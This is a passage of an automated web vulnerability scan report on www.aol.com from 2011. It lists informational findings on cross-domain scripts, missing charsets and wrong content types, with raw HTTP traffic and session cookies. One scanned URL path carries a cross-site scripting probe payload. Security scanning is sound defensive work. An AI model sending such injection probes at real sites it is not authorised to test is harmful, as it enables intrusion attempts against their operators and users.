If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


7.1. http://www.aol.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:13:43 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-174-44.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=CFBB5CE095545547E8FF9BC0BB462364; Path=/aol
Set-Cookie: tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; Expires=Sat, 17-Aug-2013 22:13:44 GMT; Path=/
Content-Length: 81413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<body class="silkscreen_surfer">
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/os/omniture/prod/omniunih_portal_min.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://portal.aolcdn.com/p5/_v58.6/js/main.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/videoplayer/loader.js"></script>
<script type="text/javascript" src="http://player.play.it/player/launchAolPlayer.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

7.2. http://www.aol.com/video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254)  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254)

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254) HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 18 Aug 2011 23:26:23 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-107-99.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=2E211D57875F8FCD299BAF70F0E8D34E; Path=/aol
Connection: close
Content-Length: 16617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://portal.aolcdn.com/p5/_v58.6/js/main.js"></script>
...[SNIP]...

7.3. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /video/urlesque-mans-about-to-do-the-impossible/1116699228001/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video/urlesque-mans-about-to-do-the-impossible/1116699228001/ HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:16:15 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-38.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=AB6892FB05BD4073E3A16F7705718005; Path=/aol
Content-Length: 40895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<body class="butterfly">
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://portal.aolcdn.com/p5/_v58.6/js/main.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/videoplayer/loader.js"></script>
<script type="text/javascript" src="http://player.play.it/player/launchAolPlayer.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

8. HTML does not specify charset  previous  next
There are 2 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


8.1. http://www.aol.com/ads/load_v7.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ads/load_v7.html

Request

GET /ads/load_v7.html HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:13:17 GMT
Server: Apache
Accept-Ranges: bytes
ntCoent-Length: 1474
Content-Type: text/html
Content-Length: 1474

<html>
<head>
<script type='text/javascript'>
var dom=location.hash
if (dom!=''){
dom=dom.substr(1)
if (dom!=1)document.domain=dom
else {
var adsIn=1;
var f=document.cr
...[SNIP]...

8.2. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ads/load_v7.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /video/urlesque-mans-about-to-do-the-impossible/1116699228001/ads/load_v7.html

Request

GET /video/urlesque-mans-about-to-do-the-impossible/1116699228001/ads/load_v7.html HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:14:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
ntCoent-Length: 1474
Content-Length: 1474

<html>
<head>
<script type='text/javascript'>
var dom=location.hash
if (dom!=''){
dom=dom.substr(1)
if (dom!=1)document.domain=dom
else {
var adsIn=1;
var f=document.cr
...[SNIP]...

9. Content type incorrectly stated  previous
There are 2 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


9.1. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=3&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; dlact=dl2

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:13:38 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-50.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2520
Set-Cookie: JSESSIONID=A3952DF32658E1DB2F8B42FB462C9CBB; Path=/aol
Content-Length: 2520

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl3 plid-87592 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...

9.2. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ajax.jsp  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.aol.com
Path:   /video/urlesque-mans-about-to-do-the-impossible/1116699228001/ajax.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /video/urlesque-mans-about-to-do-the-impossible/1116699228001/ajax.jsp?m=dailyvj&p=videoconfig HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:16:23 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-72.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Set-Cookie: JSESSIONID=26F2058D44B9A19F05B6636E05EE5CF7; Path=/aol
Content-Length: 13787

<div id="videoShowUrls" class="dn">
You've Got:pair:http://video.aol.com/show/youve-got:show:AOL Daybreak:pair:http://video.aol.com/show/aol-daybreak:show:The Urlesque Show:pair:http://video.aol.c
...[SNIP]...

Report generated by XSS.CX at Thu Aug 18 17:29:52 GMT-06:00 2011.